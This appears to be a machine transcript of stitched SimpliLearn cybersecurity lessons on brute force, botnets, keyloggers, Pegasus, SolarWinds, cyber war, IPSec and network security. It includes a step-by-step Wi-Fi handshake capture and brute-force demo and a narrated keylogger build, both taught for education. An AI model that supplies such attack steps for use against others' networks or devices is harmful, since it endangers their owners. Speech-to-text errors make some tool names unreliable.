of brute force attacks using passwords consisting of alphabets letters and numbers have a much higher chance of withstanding brute force attacks thanks to the sheer number of combinations they can produce the longer the password the less likely it is that a hacker will devote the time and resources to brute force them having alpha numeric passwords also allows the user to keep different passwords for different websites this is to ensure that if a single account or password is compromised due to a breach or a hack the rest of the accounts are isolated from the incident two-factor authentication involves receiving a one-time password on a trusted device before a new login is allowed this OTP can be obtained either via email SMS or specific 2FA applications like AI and ages email and SMS-based OTPs are considered relatively less secure nowadays due to the ease with which SIM cards can be duplicated and mailboxes can be hacked applications that are specifically made for 2FA coursees are much more reliable and secure captures are used to stop bots from running through web pages precisely to prevent brute forcing through their website since brute force tools are automated forcing the hacker to solve capture for every iteration of a password manually is very challenging the capture system can filter out these automated bots that keep refreshing the page with different credentials thereby reducing the chances of brute force considerably a definite rule that locks the account being hacked for 30 minutes after a specified number of attempts is a good way to prevent brute force attempts many websites lock account for 30 minutes after three failed password attempts to secure the account against any such attack on an additional note some websites also send an email instructing the user that there have been three insecure attempts to log into the website let’s look at a demonstration of how brute force attacks work in a real world situation the world has gone wireless with Wi-Fi taking the reigns in every household it’s natural that the security will always be up for debate to further test the security index and understand brute force attacks we will attempt to break into the password of a Wi-Fi router for that to happen we first need to capture a handshake file which is a connection file from the Wi-Fi router to a connecting device like a mobile or a laptop the operating system used for this process is paral a Linux distribution that is catered to penetration testers all the tools being used in this demo can easily be found pre-installed in this operating system if getting your learning started is half the battle what if you could do that for free visit Skill Up by SimplyLearn click on the link in the description to know more to start our demo we’re going to use a tool called AirDon which is made to hack into wireless network specifically at this point it’s going to check for all the necessary scripts that are installed in the system to crack into a Wi-Fi and to capture the handshake file we’re going to need an external network card the significance of the external network card is a managed mode and a monitor mode for now the WLX1 named card is my external network adapter which I’m going to select to be able to capture data over the air we’re going to need to put it in monitor mode as you can see above it’s written it is in manage mode right now so we’re going to select option two which is to put the interface in monitor mode and it name is now WLAN zero monitor the monitor mode is necessary to capture data over the air that is the necessary reason why we need an external card since a lot of inbuilt cards that come with the laptops and the systems they cannot have a monitor mode installed once we select the mode we can go into the fifth which is the handshake tools menu in the first step we have to explore for targets and it is written that monitor mode is necessary to select a target so let’s explore for targets and press enter we have to let this run for about 60 seconds to get a fair idea about the networks that are currently working in this locality for example this ESS ID is supposed to be the Wi-Fi name that we see when connecting to a network j24 recover me these are all the names that we see on our mobile when trying to search for the Wi-Fi this BSS ID is supposed to be an identifier somewhat like a MAC address that identifies this network from other devices the channels features on one or two or there are some many channels that the networks can focus on this here is supposed to be a client that is connected to one such network for example the station that you can see 5626 this is supposed to be the MAC address of the device that is connected to a router this BSS ID is supposed to be which Wi-Fi it is connected to for example 5895D8 is this one which is the JO24 router so we already know which router has a device connected to it and we can use our attack to capture this handshake now that we it has already run for 1 minute now that we press Ctrl C we will be asked to select a target see it has already selected the number five which is the JO24 router as the one with clients so it is easy to run an attack on and it is easy to capture a handshake for select network 5 and we run a capture handshake it says we have a valid WPA WPA2 network target selected and that the script can continue now to capture the handshake we have a couple of attacks a do or a do air replay attack what this attack does is kick the clients out of the network in return when they try to reconnect to the Wi-Fi as they are configured that way that when a client is disconnected it tries to reconnect it immediately it tries to capture a handshake file which in turn contains the security key which is necessary to initiate the handshake for our demo let’s go with the second option that is the do a air replay attack select a timeout value let’s say we give it 60 seconds and we start the script we can see it capturing data from the JO24 network and here we go we have the WPA handshake file once the handshake file is captured can actually close this and here we go congratulations in order to capturing a handshake it has verified that a PMK ID from the target network has successfully been captured this is the file that is already stored it’s a cap file for the path we can let’s say we can keep it in a desktop okay we give the path and the handshape file is generated we can already see a target over here same Jio24 router with the BSS ID now if we return to its main menu we already have the handshake file captured with us now our job is to brute force into that handshake capture file the capture file is often encrypted with the security key of the Wi-Fi network if we know how to decrypt it we will automatically get the security key so let’s go to the offline WPAWP to decrypt menu since we’ll be cracking personal networks we can go with option one now to run the brute force tool we have two options either we can go with the air crack or we can go with the hashcat let’s go with air plus crunch which is a brute force attack against a handshake file we can go with option two it can already detect the capture file that we have generated so we select yes the DSS ID is the one which denotes the GO24 router so we’re going to select yes as well the minimum length of the key for example it has already checked that the minimum length of a Wi-Fi security key which is a WPA to PSK key will always be more than 8 digits and below 64 digits so we have to select something in between this range so if we already know let’s say that the password is at least 10 digits we can go with the minimum length as 10 and as a rough guess let’s say we put the maximum length as 20 the character set that we’re going to use for checking the password will affect the time taken to brute force for example if we already know that or we have seen a user use a password while connecting to the router as something that has only numbers and symbols then we can choose accordingly let’s say if you go with only uppercase characters and numeric characters go with option seven and it’s going to start decryting so how aircraft is working right here you can see this passphrase over here the first five or six digits are a it starts working its way from the end from the last character it keeps trying every single combination you can see the last the fourth character from the right side the D it’ll eventually turn to E because it keeps checking up every single character from the end this will keep going on until all the single characters are tested and every single combination is tried out since the handshake file is encrypted using the security key that is the WPA2 key of the router whichever passphrase is able to decrypt the handshake key completely will be the key of the Wi-Fi router this is the way we can brute force into Wi-Fi routers anywhere in the world cyber attacks are frequently making headlines in today’s digital environment at any time everyone who uses a computer could become a victim of a cyber attack there are various s of cyber attacks ranging from fishing to password attacks in this video we’ll look into one such attack that is known as botnet but before we begin if you love watching tech videos subscribe to our channel and hit the bell icon never to miss an update to begin with let’s take a look at some of the famous bot attacks the first one is mai botnet which is a malicious program designed to attack vulnerable IoT devices and infect them to form a network of bots that on command perform basic and medium level denial of service attacks then we have the zeus bot specifically designed for attacking the system for bank related information and data now let’s see what exactly a botnet is botnet refers to a network of hijacked interconnected devices that are installed with malicious codes known as malware each of these infected devices are known as bots and the hijack criminal known as bot hoarder remotely controls them the bots are used to automate large scale attacks including data theft server failure malware propagation and denial of service attacks now that we know what exactly a botnet is let’s dive deeper into learning how a botnet works during the preparation of a botnet network the first step involves preparing the botnet army after that the connection between the botnet army and the control server is established and the end the launching of the attack is done by the boter let’s understand through a illustration firstly we have a boter that initiates the attack according to the control server commands the devices that are infected with the malware programs and begins to attack the infected system let’s see some details regarding the preparation of the botnet army the first step is known as the prepping the botnet army the first step is creating a botnet is to infect as many as connected devices as possible this ensures that there are enough bots to carry out the attack this way it creates bots either by exploiting the security gaps in the software or websites or using fishing attacks they are often deployed through Trojan horses for the next step we have establishing the connection once it hacks a device as per previous step it infects it with a specific malware that connects the device back to the control bot server a bot herder uses command programming to drive the bot’s actions and the last step is known as launching the attack once infected a bot allows access to admin level operation like gathering and stealing of data reading and rewriting the system data monitoring user activities performing denial of service attacks including other cyber crimes now let’s take a look at the botnet architecture the first type is known as client server model the client server model is a traditional model that operates with the help of a command and control center server and communication protocols like IRC when the boter issues a command to the server it is then relayed to the clients to perform malicious actions then we have peer-to-peer model here controlling the infected bots involves a peer-to-peer network that relies on a decentralized approach that is the ports are topological interconnected and acts as both C and C servers that is the server and the client today hackers adopt this approach to avoid detection and single point failure in the end we will see some points on some counter measure against botnet attacks the first step is to have updated drivers and system updates after that we should avoid clicking random pop-ups or links that we often see on the internet and lastly having certified antivirus anti-spyware softares and firewall installed into a system will protect against malware attack the internet is an endless source of information and data still in some cases we come across some occurrences like cyber attacks hacking force entry which may affect a time on the web hi everyone and welcome to the simply learn channel today we will discuss a topic that secretly records our input data that is known as key loggers but before we begin if you like watching tech videos subscribe to our channel and hit the bell icon to never miss an update to understand the key logging problem better let’s take a look at an example this is June she works in a business firm where she manages the company’s data regularly this is Jacob from the information department who’s here to inform her about some of the security protocols during the briefing she informed him about some of the problems her system was facing with which included slow reaction speed and unusual internet activity as Jacob heard about the problems with the system he thinks of the possibility what could be the reason behind these problems her system was facing with the conclusion that he came across was the key logging issue with unknown to the problem her system was facing with she asked him about some of the details regarding it for today’s topic we learn what exactly key loggers are and how they affect our system what are the harmful effects that key logging can bring into the system to begin with we learn what exactly the key logging program is as the name suggests key logger is a malicious program or a tool that is designed to record keystrokes that are typed during data input and record them into a lock file then the same program secretly sends these log files to its origin where they can be used for malicious acts by the hacker now that we know what the key logging program is let’s take a look how they enter into the system searching for a suitable driver for a system can often lead to the installation of the key logging program into the system if we often visit suspicious sites and uncertified software are installed into our system then if we use unknown links or visiting unknown websites which come through unknown addresses can also be a reason behind the key logging issue entering into the system and lastly there are often cases where different pop-ups that we often see on social sites or different media sites can lead to the installation of key logging program into a system now that we know how the problem gets into the system let’s take a look how to identify whether the system is infected by the key logging issue the key locking issue can be identified if there are often cases when a keyboard lags behind the system the data that we enter sometimes is stuck in between when we type through the input then there are cases when the system freeze occurs unknowingly to what exactly could be the reason behind them and also there are delayed reaction time for different applications that run on the system and lastly there are different cases when we often see suspicious internet activity on the system that we don’t know about this could lead to the identification of a problem into the system now we’ll take a look at different types of key loggers that are present on the net which can harm a system differently the first problem that key loggers arouse is API based the most common key logging case which uses APIs to keep a log of the type data and share it to its origin for malicious purposes each time we press a key the key logger intercepts the signal and logs it then we have form grabbing based key loggers as the name suggests they are a based key loggers that store the form data that is if we often use web forms or different kinds of forms to enter different data they can be recorded into the system by the program and send it to its origin then we have kernelbased key loggers these key loggers are installed deeply into the operating system where they can hide from different antivirus if not checked properly and they record the data that we type on the keyboard and send it to its origin and lastly we have hardware key loggers these key loggers are present directly into the hardware that is they are embedded into system where they record the data that we type on the keyboard now let’s take a look how hackers differentiate different type of recorded data and exploit them when hackers receive information about the target they might use it to blackmail the target which may affect the personal life of the target and also blackmail them for different money related issues then in case of company data that is recorded by the key logging program can also affect the economic value of the company in the market which may lead to the downfall of the company also in some cases the key logging program can also log data about military secrets which may include nuclear codes or security protocols which are necessary to maintain the security of a country now let’s take a look whether mobile devices get infected with the key logging issue or not in the case of hand devices infection of key loggers are low in comparison to the computer systems as they use onscreen keyboard or virtual keyboard but in some cases we often see different kinds of malicious programs getting installed into the hand device if we often visit different uncertified websites or illegal websites or torrent sites and also the device that is infected with the key logging issue or different kind of malicious program can often lead to the exploitation of data that includes photos emails or important files by the hacker or the cyber criminal that installed the particular malicious program into the system now to prevent our system from getting infected by the key locking program let’s take a look at different points the first point includes using of different antivirus softares or

tools which can prevent the entering of malicious program into the system then keeping system security protocols regularly updated is also a good habit and lastly using virtual keyboard to input our sensitive data which may include bank details login details or different passwords related to different websites now that we have some understanding about the topic of key loggers let’s take a look at the demo to further increase the knowledge about the topic for the first step we have to download some of the important libraries that are required into the system which is this library now we’ll run it the system says the library is already installed into the system now let’s take a look what exactly modules are required from the particular library from this library we’ll import the keyboard module which will help us to record the data that we type on the keyboard now from the same we’ll also import key module and the listener module and also the logging module which will help us to record the data into a log file for the next part we’ll write a piece of code that will allow us to save the data that is recorded by the program into a text file that will be named as key log text file along with the date and time stamp let’s take a look now we’ll provide it with the file name that will be given as key log dot txt file and also so the part where the format of the data is recorded put the brackets over here to contain the file name now we’ll write the format in which the data will be recorded into the log file which will be given as the format would be the message and the time stamp which would be given as along the time stamp given as percentage and ending it with the bracket now for the next step we’ll design two of the functions that will be used into the program that will be termed as wild press function and while release function let’s take a look while press function would be a function that will come into play when the keyboard key has been pressed is pressed and This would go for the format that we designed in the above line and logging the pressed key info a string file to be recorded into the LO file now now we’ll design a function that is while release that will come into play when the escape key has been pressed that is the program will terminate itself and the program will stop from running and in the end we require for the functioning of the program to loop these functions that is while press and while deletes to continue its cycle that will be going for while press and on release will contain while release function as listener and now this part would join the different threads and store them into the LO file now that we have completed the code for the program let’s run it we have to wait for a moment so the program runs it now to verify the program let’s open notepad and on the notepad we’ll write hello world which will be the basic whether the program is working or not let’s take a look and we’ll go for the main page on Jupyter notebook and refresh the page go to the bottom over here we see the key log text that is the text file that we created let’s open it and over here we have the data that is created as we started with note then this is the hello world part that we created just now which shows that the program we created is working properly now that we have reached the end of the module let’s take a look at the summary firstly we learned what exactly key loggers are then we understood what different modes are present how the system get infected with a key logging problem then we learned how to detect the problem into our system then we learned what different types of key loggers are present on the net we also understood how hackers use the recorded data from the program and we also learned whether mobile devices get infected with the key logging problem or not and lastly we understood what different points can be taken to prevent the entering of the key logging problem into the system and before we begin if you are someone who is interested in building a career in cyber security or to become an ethical hacker by graduating from the best universities or a professional who elicits to switch career with cyber security or ethical hacker by learning from the experts then try using a short to simply learn postgraduate program in cyber security with modules from MIT Schwarzman College of Computing the course link is mentioned in the description box below that will navigate you to the course page where you can find a complete overview of the program being offered before we learn about the Pegasus platform let us understand what spyware is and its working spyware is a category of malware that can gather information regarding a user or a device straight from the host machine it is mostly spread by malicious links via email or chat applications when a link with the malware is received clicking on this link will activate the spyware which allows the hacker to spy on all our user information with some spyware systems even clicking on the link isn’t necessary to trigger the malicious payload this can ultimately cause security complications and further loss of privacy one such spyware system that is making the rounds in the tech industry today is Pegasus the Pegasus is a spyware system developed by an Israeli company known as the NSO group it runs on mainly mobile devices spanning across the major operating systems like the Apple’s iOS on iPhone and the standard Android versions this is not a newly developed platform since Pegasus has existed since as early as 2016 a highly intricate spyway program that can track user location read text messages scan through mobile files access device camera and microphone to record voice and video pegasus has all the tools necessary to enforce surveillance for any client that wishes to buy its services initially the NSO group had designed the software to be used against terrorist factions of the world with more and more encrypted communication channels coming to the forefront Pegasus was designed to maintain control over the data transmission that can be a threat to national security unfortunately the people who bought the software had complete control over who how and up to what level they can put surveillance limits on eventually the primary clients became sovereign nations spying on public information that is supposed to stay private became really easy with this service multiple devices can be affected with the same spyware system to create a network information this network keeps feeding data to the host to understand how a network can be created let’s know how a mobile device can be affected by Pegasus we all communicate with friends and family over instant messaging applications and email in some instances if you check your inbox on a regular basis you must have noticed that we receive some spam emails that the mail providers like Gmail and Yahoo can just filter into the spam folder some of these messages bypass this filter and make their way into a person’s inbox they look like generic emails which are supposed to be safe the Pegasus spyware targets such occurrences bypassing malicious messages and links which install the necessary spy software on the user’s mobile device be it Android or an iPhone this isn’t unique to the email ecosystem since it’s equally likely to be targeted by SMS text WhatsApp Instagram or even the most secure messaging apps like Signal and Threma once the malicious links are clicked a spyware package is downloaded and installed on the device after the spyware is successfully installed the perpetrator who sent the payload to the victim can monitor everything the user does pegasus can collect private emails passwords images videos and every other piece of information that passes through the device network all this data is transmitted back to the central server where the primary spying organization can monitor the activities at a granular level this is not even surface level since complex spyware software like Pegasus can access the root files on our mobiles these root files hold information that is crucial to the working of the Android and iOS operating systems leaking such private information is a massive blow to the security and the privacy of an individual the information that may seem trivial like the name of your Wi-Fi connection or the last time you ordered an item from Amazon are indeed all valuable information this exploitation is primarily possible due to the zeroday vulnerabilities known as bugs in the software development process the zeroday bugs are the ones that have just been discovered by some independent security company or a researcher once they are found reporting these vulnerabilities to the developer of the platform which would be either Google for Android or Apple for iOS is the right thing to do however many such critical bugs make their way onto the dark web where hackers can use them to create exploits these exploits are then sent to innocent users with a link or a message like we had discussed before Pegasus was able to affect the latest devices with the all the security patches installed but some bugs are not reported to the developers or just cannot be fixed without breaking some core functionality these become the gateway for spyware to enter into the system you can never be 100% safe but you sure can give it all in protecting yourself the one thing where Pegasus stands out is it zeroclick action feature usually in spam emails the malicious code is activated when the user clicks the malware link a user doesn’t need to click the link in the new version of the Pegasus and a few other spyware programs once the message arrives in the inbox of WhatsApp Gmail or any other chat applications the spyware gets activated and everything can be recorded and sent back to the central server the primary issue with being affected by spyware as a victim is detection unlike crypto miners and Trojans spying services usually do not demand many system resources which makes them tough to detect after they have been activated since many devices slow down after a couple of years any kind of performance set due to such spyware is often attributed to poor software longevity by the users they do not check meticulously for any other causes that is causing the slowdown when left unchecked these devices can capture voice and video from the mobile sensors while keeping the owner in the dark let’s take a moment to check if you are well aware of the causes of such attacks how do users fall prey to such spyware programs a by installing untested software B by clicking on the third party links from email and messages C by not keeping their apps and phones updated or D all of the above let us know your answers in the comment section below and we will reveal the correct answer next week but what about the unaffected devices the vulnerable ones while we cannot be certain of our security there are a few things we can do to boost our device be it against Pegasus or the next big spyware on the market let’s say we are safe now and we have the time to take the necessary steps to prevent a spyware attack what are the things we can go for a primary goal must always be to keep our apps and the operating system updated with the latest security patches the vulnerabilities that the exploits target are often discovered by developers from Google and Apple which send the security patches quickly this can be done for individual apps as well so keeping them updated is of utmost importance while the most secure devices have fallen prey to Pegasus as well a security patch from developers may help in minimizing the damage at a later stage or maybe negate the entire spyware platform altogether another big factor is the spread of malware is the trend of sideloading Android applications using APK files downloading such apps from a third party website have no security checks involved and are mostly responsible for adear and spyware invasions on user devices avoiding the sideloading of apps would be a major step in protecting yourself we often receive spam emails or texts from people we may not know on social medias they are accompanied with links that allow malware to creep into our device we should try to follow the trusted websites and not click on any links that redirect us to unknown domains spyware is a controversial segment in governance while the ramifications are pretty extreme in theory it severely impacts user privacy against authoritarian regimes sufficient resources and a contingent plan can alter the false veil of democracy altogether even if our daily life is rather simplistic we must understand that privacy is not about what we have to hide instead it portrays the things we have to protect it stands for everything we have to share with the outside world both rhetorically and literally hey everyone today we look at the hack which took the world by storm and affected multiple governments and corporations the Solar Winds attack the global statistics indicate that upward of 18,000 customers have been affected potentially needing billions to recover the losses incurred before we have a look at this hack make sure to subscribe to our channel and hit the notification bell to never miss an update from Simpler the date is December 8th 2020 fire a global leader in companies specializing in cyber security released a blog post that caught the attention of the entire IT community a software known as Orion which was developed by Solar Winds Incorporated had become a victim of a remote access Trojan or a rat the breach was estimated to be running since the spring of 2020 and went virtually unnoticed for months the reveal sent the developers of the Orion software into a frenzy as they quickly released a couple of hot fixes for their platform in order to mitigate this threat and prevent further damage but how did this come into existence we first need to understand the platform which was responsible for this breach solowins a software company based in Texas United States had developed a management platform known as Orion itering to corporations and governments worldwide orion was responsible for the monitoring and management of IT administration this included managing the client servers virtualization components and even the organization’s network infrastructure that bought the platform solowins claims they have more than 300,000 clients including US government agencies and several Fortune 500 companies this entire chain can be classified as a supply chain attack in this variant of cyber crime the hackers target relatively weaker links in an organization’s chain of control and delivery these are prefilibly services rendered by a third party since there is no direct jurisdiction over it in this case the Orion platform was the primary target the culprit however was software updates the update server for Solowins Orion had a malicious version attached with malware or a Trojan to be precise this was made possible since the code repository that handled the software updates was breached once the update server repository was compromised the source code of the applications became open to modification and malicious code found its way onto the software the remote access Trojan was attached to a potential update nicknamed the Sunburst update this update gave hackers back door access to any client that uses the correct version on its release many clients believed the update to be legitimate since it came from the right source and they had no reason to believe otherwise american government agencies were supposedly hit the hardest as the list of victims included the US departments of homeland security Treasury and Health several private companies like Cisco Nvidia and Intel were compromised according to a list published by the cyber security firm Trusk most of the companies had issues quick updates to fix this vulnerabilities introduced by the software while the actual perpetrators have never been found it is believed that this was an act of crossber corporate espionage conducted by state sponsored hackers either from Russia or China before we move forward let’s take a recap of the things we learned what category of malware was responsible for the Solar Winds hack was it one a virus a remote access Trojan a spyware or a worm let us know your answers in the comment section right away and we will reveal the correct answer in a week coming to possible reparations the Biden government has launched a full investigation on the effects and the repercussions of this breach there are a couple of things that we as consumers must always tend to when working our way through the worldwide web using a password manager is highly recommended which can generate secure alpha numeric passwords you must also use different passwords for different accounts thereby reducing the chances of a single point of failure should one of those accounts get breached usage of two-factor authentication applications is also encouraged since it acts as a safety net if hackers directly get a hold of our credentials clicking on unknown links transmitted via emails is also a strict no as is installing applications from unverified sources the Solar Winds hack is estimated to cost the parent company nearly $18 million as reparations making it one if not the biggest hacks in cyerspace history as recently as of July 2021 the hackers accessed some US attorneys Microsoft 365 email accounts as part of the attack criminal organizations like the FBI and CIA are determined to figure out the culprits responsible for this debacle however the intricacy and the full extent of the breach makes it a way more complicated job than it looks on paper the day is 26th February 2022 the world is hit with breaking news that Russian state TV channels have been hacked by Anonymous a activist collective and movement who have made a name taking part in multiple cyber wars in the past decade this was in response to the Russian aggression on Ukrainian territory in the hopes of annexation anonymous hacked the Russian state TV networks to combat propaganda in Russia and highlight the damage to life meed out by the Kremlin in Ukraine they also hacked 120,000 Russian troops personal information and the Russian central bank stealing 35,000 files this served as a clear indicator of how cyber war can change the momentum in battle something which people had never seen so closely so what is cyber war a digital assault or series of strikes or hacks against a country is sometimes referred to as a cyber war it has the ability to cause havoc on government and civilian infrastructure as well as disrupt essential systems causing state harm and even death in this day and age the internet plays a bigger role than just watching videos and learning content it’s where you have your personal data and carry financial transactions so rather than resorting to physical violence cyber wars become the new means to cause havoc considering the vulnerability of the data passing through the internet in most circumstances cyber warfare involves the nation state attacking another in certain cases the assaults are carried out by terrorist organizations or non-state actors pursuing a hostile nation’s aim in June 2021 Chinese hackers targeted organizations like Verizon to secure remote access to their networks stuckset was a computer worm designed to attack Iran’s nuclear facilities but evolved and expanded to many other industrial and energy producing sites in 2010 since the definition of cyber war is so vague applying rules and sanctions based on digital assault is even tougher making the field of cyber warfare a lawless land not bound by any rules or policies there are multiple ways in which these attacks can be carried out a major category of cyber attack is espionage espionage entails monitoring other countries to steal critical secrets this might include compromising vulnerable computer systems with botn nets or spear fishing attempts before extracting sensitive data in cyber warfare the next weapon in cyber war is sabotage government agencies must identify sensitive data and its dangers if it is exploited insider threats such as disgruntled or irresponsible personnel or government staff with ties to the attacking country can be used by hostile countries or terrorists to steal or destroy information by overwhelming a website with bogus requests and forcing it to handle them denial of service attacks prohibit real users from accessing it attacking parties may use this form of assault to disrupt key operations and systems and prevent citizens military and security officials and research organizations from accessing sensitive websites but what benefits does cyber war offer in contrast to traditional physical warfare the most important advantage is the ability to conduct attacks from anywhere globally without having to travel thousands of miles as long as the attacker and target are connected to the internet organizing and launching cyber wars is relatively less tedious than physical warfare people living in or battling for a country are subjected to propaganda attacks in an attempt to manipulate their emotions and thoughts digital infrastructure is highly crucial today’s modern world starting from communication channels to secure storage servers crippling a country’s footprint and control on the internet is very damaging but what are some of the ways we as citizens protect ourselves in the case of a cyber war in the unfortunate event that your country is involved in warfare be sure to fact check every piece of information and follow only trusted sources in that frame of time even conversations online should be limited to a need to know basis considering propaganda campaigns have the power to influence the tide of war drastically it is highly crucial to follow basic security guidelines to secure our devices like regularly updating our operating systems occasionally running full system antivirus scans etc if your country or organization is being attacked having devices segregated in a network goes a long way in bolstering security try to avoid sharing a lot of personal data online in this era of Instagram and Facebook divulging private information can be detrimental to keeping a secure firewall for your data the more information an attacker has access to the higher his chances of being able to devise a plan to infiltrate defenses and if you’re someone who is interested in building a career in cyber security that is by graduating from the best universities or a professional who elicits to switch careers with cyber security by learning from the experts then try giving a shot to simply learn post-graduate programming cyber security with modules from the MIT Schwarzman College of Engineering and the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered during data transmission there are various external factors which can affect the transmission of data over a network channel to prevent such cases from happening we use internet protocol security which we’ll be discussing in this session on IPSec explain hi guys and welcome to yet another interesting video by simply learn but before we begin if you love watching tech videos subscribe to our channel and hit the bell icon to miss an update from us now without further ado let’s take a look at the agenda for this session to begin with we will look into what is IPSec continuing with why do we use IPSec in a network followed by components of IPSec modes of IP security as for the last topic we will look into working steps involved in IP security let’s begin with the first setting that is what is IPSec ipsec internet protocol security is defined as a set of framework and protocol to ensure data transmission over a network this protocol was initially defined of two main protocols for data security over a network channel which were authentication header which is responsible for data integrity and anti-replay services and the second protocol is encapsulating security payload in short ESP which includes data encryption and data authentication now let’s move on to the next setting that is why do we use IPSec in a network ipsec is used to secure sensitive data and information such as company data clinical data bank data and various sensitive information regarding an institution which are used during data transmission over a network channel the use of VPNs that are virtual private networks and apply IPSec protocols to encrypt the data for end to-end transmission let’s continue with why do we use IPSec services ipsec is also used to encrypt data for application layer in the OSI model and provide security for sharing data over network routers and data authentication let’s take a look at the working of IPSC services to begin with we have two different system system one and system two which will establish a network channel and then the encryption of data will takes place when one host will share the data to the second host during this IP sec services will secure the data that is to be transferred over the network channel by applying router encryption and authentication now let’s move on to the next topic that is components of IPSec the IPSec services comprises of multiple protocols that ensure the data transmission over the network channel the first one is encapsulating security payload protocol in short ESP this protocol of IP security provides data encryption and authentication services and it also authenticates and encrypt the data packet in the transmission channel moving on we have authentication header in short ah similar to ESP the authentication header also provides all the security services but it does not encrypt the data it also protects the IP packet and adds additional headers to the packet header the modified IP datagramgram looks this way where the IP components are included at the second position the seventh position and the sixth position along with the authentication of data services over the network channel moving on we have internet key exchange IKE this protocol provides protection for content data and also changes the attribute of the original data to be shared by implementing SHA and MD5 algorithms they also check the message for authentication and then only is forwarded to the receiver side for example this is the original data packet we are used to with IP header part TCP UDP and data whereas this is the modified IPSC data packet where TSP header is added between IP header and the TCP protocol now let’s move on to the next heading that is modes of IPSec there are basically two types of IPSec modes available for data transmission over the network channel where the first one is tunnel mode this mode of transmission is used to secure gateway to gateway data it is applied when the final destination of the data is to be connected to a sender site through a connection gateway over the internet for example we have two host host A and host B through the host A we are sending a message to host B which will pass through a gateway at host A point and it passes through a gateway to host B this is a basic format for gateway to gateway data transmission and the given IP datagramgram format is used for tunnel mode now let’s move on to the second mode of IPSec that is transport mode this mode of IPSec is used to protect protocols like TCP or UDP and is used to ensure end to end communication unlike tunnel mode the transport mode data at authentication header and encapsulating security payload for security purpose in the IP header this is the modified IP datagramgram for transport mode the point to be noted is the IPSec header is always added between IP header and TCP header now let’s move on to the last setting for this session on IPSec that is the working steps involved in IP security in general there are five steps involved in the working of IPSec to ensure data transmission over a network channel the first step is host recognition in the first step the host system will check if the packet is to be transmitted or not by automatically triggering the security policy for the data which is implemented by the sender side for proper encryption then the second step is known as IKE phase one in this step the two host devices the sender and the receiver side will authenticate each other to establish a secure network channel it is comprised of two modes the main mode this provides much better security with a proper time limit and the second mode known as aggressive mode as the name suggests it establishes the IPSC protocol much faster in comparison to main mode let’s move on to the third step which is IKE phase 2 after the second step the host decide the type of cryptography algorithm to apply over the session in the network channel and the secret key for the algorithm to be used to encrypt the data for transmission then we have IPSec transmission this step involves the actual transfer of data over the network channel using various protocols used in IPSec security which are implemented under the tunnel condition and the last step is IPSec termination after the completion of data exchange or session timeout the IPSec tunnel is terminated and the security key established is discarded by both the host system network security is a set of technologies that protects the usability and integrity of a company’s infrastructure by preventing the entry or proliferation within a network it architecture comprises of tools that protect the network itself and the applications that run over it effective network security strategies employ multiple lines of defense that are scalable and automated each defensive layer here enforces a set of security policies which are determined by the administrator beforehand this aims at securing the confidentiality and accessibility of the data and the network the every company or organization that handles a large amount of data has a degree of solutions against many cyber threats the most basic example of network security is password protection it has the network the user chooses recently network security has become the central topic of cyber security with many organizations involving applications from people with skills in this area it is crucial for both personal and professional networks most houses with highspeed internet have one or more wireless routers which can be vulnerable to attacks if they’re not adequately secured data loss theft and sabotage risk may be decreased with the usage of a strong network security system the workstations are protected from hazardous spyware thanks to network security additionally it guarantees the security of the data which is being shared over a network by dividing information into various sections encrypting these portions and transferring them over separate pathways network security infrastructure offers multiple levels of protection to thwart man-in-the-middle attacks preventing situations like eavesdropping among other harmful attacks it is becoming increasingly difficult in today’s hyperconnected environment as more corporate applications migrate to both public and private clouds additionally modern applications are also frequently virtualized and dispersed across several locations some outside the physical control of the IT team network traffic and infrastructure must be protected in these cases since assaults on businesses are increasing every single day we now understood the basics of network security but we need to understand how network security works in the next section in slightly more detail network security revolves around two processes authentication and authorization the first process which is authentication is similar to access path which ensure that only those who have the right to enter a building in other words authentication checks and verifies that it is indeed the user belonging to the network which is trying to access or enter it thereby preventing unauthorized intrusions next comes authorization this process decides the level of access provided to the recently authenticated user for example network admin needs access to the entire network whereas those working within it probably need access to only certain areas within the network based on the network users role the process of determining the level of access or permission level is known as authorization today’s network architecture is complex and faces a threat environment that is always changing and attackers that are always trying to find and exploit vulnerabilities these vulnerabilities can exist in many areas including devices data applications users and locations for this reason many network security management tools and applications are in use today that address individual threats when just a few minutes of downtimes can cause widespread disruption and massive damage to an organization’s bottom line and reputation it is essential that these protection measures are in place beforehand now that you know a little about network security and its working let’s cover the different types of network security the fundamental tenant of network security is the layering of protection for massive networks and stored data that ensure the acceptance of rules and regulations as a whole there are three types the first of which is physical security the next being technical and the third being administrative let’s look into physical security first this is the most basic level that includes protecting data and network to unauthorized personnel from acquiring control over the confidentiality of the network this include external peripherals and routers that might be used for cable connections the same can be achieved by using devices like biometric systems physical security is critical especially for small businesses that do not have many resources to devote to security personnel and the tools as opposed to large firms when it comes to technical network security it focuses mostly on safeguarding data either kept in the network or engaged in network transitions this kind fulfills two functions one is defense against unauthorized users the other is a defense against malleent actions the last category is administrative this level of network security protects user behavior like how the permission has been granted and how the authorization process takes place this also ensures the level of sophistication the network might need to protect it through all the attacks this level also suggests necessary amendments that have to be done to the infrastructure i think that’s all the basics that we need to cover on network security in which our next topic we’re going to go through two mediums of network security which are the transport layer and the application layer so transport layer is a way to secure information as it is carried over the internet with users browsing websites emails instant messaging etc tls aims to provide a private and secure connection between a web browser and a website server it does this with the cryptographic handshake between two systems using public key cryptography the two parties through the connection and exchange a secret token and once each machine validates this token it is used for all communications the connection employs lighter symmetric cryptography to save bandwidth and processing power since the application layer is the closest layer to the end user it provides hackers with the largest threat surface poor app layer security can lead to performance and stability issues data theft and in some cases the network being taken down examples of application layer attacks include distributed denial of service attacks or DDoS attacks HTTP floods HQ injections cross-sight scripting etc most organizations have an arsenal of application layer security protections to combat these and more such as web application firewalls secure web gateway services etc now that we have the theory behind network security has been covered in detail let us go through some of the tools that can be used to enforce these network security policies the first tool to be covered in this section is a firewall a firewall is a type of network security device that keeps track of incoming and outgoing network traffic and it decides which traffic to allow or deny in accordance to a set of security rules for more than 25 years firewalls have served as network security’s first line of defense they provide a barrier between trustworthy internal protected and regulated networks from shady external networks like the internet at some points the next tool which can be used to bolster network security is a virtual private network or VPN for short it’s an encrypted connection between a device and a network via the internet the encrypted connection aids the secure transmission of sensitive data it makes it impossible for unauthorized parties to eaves drop on the traffic and enables remote work for the user the usage of VPN technology is common in both corporate and personal networks next we cover the importance of intrusion prevention systems in network security or IPS frameworks an intrusion prevention system is a network security tool that continually scans a network for harmful activity and responds to it when it does occur by reporting blocking or discarding it it can be either hardware or software it’s more sophisticated than an intrusion detection system or an IDS framework which can just warn an administrator and merely identify harmful activities while in the case of an IPS it actually takes against that activity the next tool 